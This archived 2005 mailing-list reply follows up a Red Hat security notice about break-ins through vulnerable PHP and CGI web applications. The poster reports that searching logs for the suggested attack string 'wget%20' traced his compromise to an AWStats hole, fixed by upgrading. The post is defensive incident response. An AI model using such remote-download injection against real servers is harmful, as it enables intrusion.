 | | | Unpatched security exploits? SOLVED | Unpatched security exploits? SOLVED 2005-02-04 - By Pete Deffendol
Back
Mark J Cox wrote:
> The Red Hat Security Team have seen a small number of reports of
> compromises having a similar pattern since the start of the year. In
> all the cases so far the fault had been traced to third party web
> applications, sometimes due to badly written PHP scripts (the last one
> was a vulnerable PHP photo album application that a user had
> installed), or sometimes due to CGI programs that have had flaws.
>
> If the attacker did not manage to gain root then examining your Apache
> error and access logs may help lead you to the vulnerable script; try
> looking for a string such as "wget%20" which has been common on PHP
> attacks so far.
>
> Please let us know at secalert@(protected) (in confidence if you wish)
> if you discover the application at fault so we can track the cause of
> these issues.
Thanks for the information - your suggested search string found the
source of the problem and the culprits. The break-in was due to a
security hole in AWstats that was patched on Jan. 28. Upgrading to
AWStats 6.3 has fixed the hole.
Pete
--
Pete Deffendol
Software Engineer
Multimedia Data Services Corp.
pete@(protected)
--
Taroon-list mailing list
Taroon-list@(protected)
http://www.redhat.com/mailman/listinfo/taroon-list
Earn $52 per hosting referral at Lunarpages.
|
|
|